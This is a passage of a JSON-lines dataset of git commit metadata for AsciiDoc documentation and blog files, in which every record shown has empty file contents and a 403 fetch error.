access 'https:\/\/github.com\/asciidoctor\/asciidoctorj-groovy-dsl.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"9084df7ebdfc6a9eb2f95b1f31b679297f8fc47f","subject":"Polish","message":"Polish\n","repos":"k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4a57664843751eee3333cf129b19f1185ba0823","subject":"Added git tutorial 3","message":"Added git tutorial 3","repos":"GYMY-16\/udi-01-TomasZilinek","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/udi-01-TomasZilinek.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ce489a2e287a4e6335d8c2c329a3e5ba050808e","subject":"Add basic README.adoc with build status","message":"Add basic README.adoc with build status\n","repos":"mkobit\/ratpack-kotlin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkobit\/ratpack-kotlin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"696ba9646b2bf03d6b1b33151784be43dd27504c","subject":"Update 2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","message":"Update 2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","new_file":"_posts\/2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40c145209ca4afe77cd8ff59ad9a9082b563bb41","subject":"initial draft","message":"initial draft","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/service-assurance\/monitors\/JmxMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/service-assurance\/monitors\/JmxMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"adc87024b78a8a8cf82fa03ea3a82da5c2bd4b55","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 
2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847c9948077f660c027c7094a4725183d4f2a0cb","subject":"Update 2015-07-20-Micro-Services-checklist.adoc","message":"Update 2015-07-20-Micro-Services-checklist.adoc","repos":"rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io","old_file":"_posts\/2015-07-20-Micro-Services-checklist.adoc","new_file":"_posts\/2015-07-20-Micro-Services-checklist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohithkrajan\/rohithkrajan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83be78a13aa2a6e264dae46b3f131e3ba05b7d46","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8976d7b8c996bb42592d861950027bc067dff5f2","subject":"Added a snippet fro project with templates","message":"Added a snippet fro project with templates\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"06_working_with_projects\/creating_project_from_template.asciidoc","new_file":"06_working_with_projects\/creating_project_from_template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"530c9e7089aac37b597f37aaee995d31291bf363","subject":"Update 2016-11-05-Saturday-Morning.adoc","message":"Update 2016-11-05-Saturday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf96f8a61e80c613a4aec3adc8d16667a4c564ef","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 
2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16fc63084ae489a47c874ce97f39760e390c0da3","subject":"gogo initial","message":"gogo initial\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/gogo\/gogo-telnet.adoc","new_file":"2014\/gogo\/gogo-telnet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"990b15682e81f84ee89ab75c23d36a71ea00f114","subject":"Update 2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","message":"Update 2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_file":"_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5280e85d2a9112559ea54fa5e75b744b26efca84","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b11345b59b37e889a2d163fd46fabb019aa913","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2eaabaff256b6dd7c948fe7939456c62888ef8ad","subject":"Announcing Debezium UI PoC","message":"Announcing Debezium UI 
PoC\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-10-22-towards-debzium-ui.adoc","new_file":"blog\/2020-10-22-towards-debzium-ui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c071c7a00197e8d3d1d1956b2c2dda63ae37bc9","subject":"Port forward to Grafana dashboard works in any case","message":"Port forward to Grafana dashboard works in any case\n","repos":"scholzj\/barnabas,scholzj\/barnabas,ppatierno\/kaas,ppatierno\/kaas","old_file":"documentation\/adoc\/appendix_metrics.adoc","new_file":"documentation\/adoc\/appendix_metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzj\/barnabas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d1865e1fda8a69fc93ef8dfae56917fd222946a","subject":"Update 2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","message":"Update 2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","repos":"lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie","old_file":"_posts\/2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","new_file":"_posts\/2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lrabiet\/patisserie.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4caf9ca617b6aa2a95bf7de2e8f8e91db09ce083","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20780534faf2a6bd61ed3e0b57292d3f43c7c947","subject":"Update 2017-04-18-Test.adoc","message":"Update 2017-04-18-Test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-04-18-Test.adoc","new_file":"_posts\/2017-04-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f4c900a12f85d2e814ead13fbfbf8733590e2f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2c14446625c7fe5a931fe4f377ef4a92f3dcc5c","subject":"Update 2015-07-15-iOS-9-core-spotlight.adoc","message":"Update 
2015-07-15-iOS-9-core-spotlight.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-07-15-iOS-9-core-spotlight.adoc","new_file":"_posts\/2015-07-15-iOS-9-core-spotlight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90790c131e6b067ce75505b54b548299ce90f4e8","subject":"y2b create post Tesla Model S First Look CES 2012","message":"y2b create post Tesla Model S First Look CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Tesla-Model-S-First-Look-CES-2012.adoc","new_file":"_posts\/2012-01-12-Tesla-Model-S-First-Look-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db66033fc0f711d24e96a5a7e6581d42d27a8f83","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a362527597f72e919b5c232ccfad07af4594d61c","subject":"Bz1032836: Remove AS7 from helloworld-osgi code examples in the guide","message":"Bz1032836: Remove AS7 from helloworld-osgi code examples in the 
guide\n","repos":"DLT-Solutions-JBoss\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quicksta
rts,Maarc\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,jamezp\/quickstart,praveen20187\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,jamezp\/quickstart,codificat\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,jamezp\/quickstart,hguerrero\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts","old_file":"guide\/HelloworldOSGiQuickstart.asciidoc","new_file":"guide\/HelloworldOSGiQuickstart.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fabiomartinsbrrj\/jboss-eap-quickstarts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ee72ae72db3f3d897bdc47bf7c8a288ddcc5be7","subject":"Fix formatting in update-by-query (#22628)","message":"Fix formatting in update-by-query (#22628)\n\nThe automatic slicing section wasn't displaying the bullet list 
correctly.","repos":"fernandozhu\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,artnowo\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,JSCooke\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch,mikemccand\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,rlugojr\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,elasticdog\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/ela
sticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,obourgain\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,a2lin\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,geidies\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,mikemccand\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,Stacey-Gammon\/elasticsearch,